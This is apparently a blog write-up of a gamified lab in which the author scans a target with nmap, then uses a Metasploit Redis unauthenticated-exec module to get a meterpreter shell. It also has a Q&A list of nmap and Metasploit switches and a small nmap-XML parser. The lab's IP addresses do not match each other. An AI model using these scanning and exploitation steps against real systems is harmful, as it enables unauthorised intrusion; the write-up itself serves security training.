I just stumbled across this funny little browser game. It’s a nice idea of gamification where you can learn some IT-Security skills.
I thought I’ll give it a try, so let’s play 😉
Start the lab to get a terminal on an attacker machine that has tools like Nmap, Metasploit, etc. installed. Your task is to get root on a target database server on the same network and in the process successfully complete the tasks on the left to win the cup!
Finding the IP of the target server:
Run „ip addr“ on the shell to find all your interface IP addresses. One of the IPs will be in the range 192.X.Y.2. Your target server has the IP 192.X.Y.3
First, let’s check in the terminal which IP address we have:
126.96.36.199 is our IP address. Our target must be 188.8.131.52.
For the first flag we need to know on which port the Redis server is running. Let’s perform an nmap scan.
nmap -sS -sV -p- 184.108.40.206
The Redis server is running on port 6379, which is the first flag.
Let’s go over to the next puzzle…
For that we have to start the metasploit console…
and do a query for „redis“ to check the available exploits…
The second flag must be: exploit/linux/redis/redis_unauth_exec
So let’s check if we can run this exploit against our target server so that we can solve the next flag 🙂
During documentation, the lab crashed once. After restarting I got a new IP address. Therefore attacker and target IP changed…
set rhosts 220.127.116.11
set lhost 18.104.22.168
set srvhost 22.214.171.124
We have a meterpreter shell 🙂
Let’s see what we find. There is a file called flag, but no run.sh shell script…
Leaving the root directory and seeing what we have…
There’s the run.sh script.
That’s the name of the service and our next flag.
- basic commands of nmap
- basic commands of metasploit for exploiting a target
basic nmap commands:
First, how do you access the help menu?
Often referred to as a stealth scan, what is the first switch listed for a ‚Syn Scan‘?
Not quite as useful but how about a ‚UDP Scan‘?
What about operating system detection?
How about service version detection?
Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag?
What about ‚very verbose‘? (A personal favorite)
Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format?
Aggressive scans can be nice when other scans just aren’t getting the output that you want and you really don’t care how ‚loud‘ you are, what is the switch for enabling this?
How do I set the timing to the max level, sometimes called ‚Insane‘?
What about if I want to scan a specific port?
How about if I want to scan every port?
What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run.
What if I want to run all scripts out of the vulnerability category?
What switch should I include if I don’t want to ping the host?
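As an added example that is not part of the original post, and tying the port-finding step from the lab to the XML-output question above: a small Python parser for nmap’s -oX output that lists only the ports reported as open (filtered and closed ones are skipped) and picks out the port of the Redis service. The XML is a constructed sample with a made-up host address and ports, not the lab’s real scan.

```python
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sS -sV -p- -oX scan.xml <target>` writes; host and ports are made up.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -p- -oX scan.xml 192.0.2.3">
  <host>
    <address addr="192.0.2.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="filtered" reason="no-response"/>
        <service name="http"/>
      </port>
      <port protocol="tcp" portid="6379">
        <state state="open" reason="syn-ack"/>
        <service name="redis" product="Redis key-value store" version="5.0.7"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def open_services(xml_text):
    """Return {(host, port): service_name} for every port nmap reports as open."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not listening services
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            result[(addr, int(port.get("portid")))] = name
    return result

def port_of_service(xml_text, service):
    """Port number of the first open port whose detected service matches, or None."""
    for (_, port), name in open_services(xml_text).items():
        if name == service:
            return port
    return None
```

Run against a real scan by reading the -oX file and passing its text to port_of_service(text, "redis").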
basic metasploit commands:
how do you start the metasploit console?
what command do you use to search for a specific exploit?
search „service or exploit name“
how do you use a specific exploit?
how do you check if a target is vulnerable after an exploit is loaded?
check „target ip address“
how do you get the option switches of a specific exploit?
how do you show and use payloads of a specific exploit?
set payload linux/…
how do you configure the exploit options?
how do you run a specific exploit?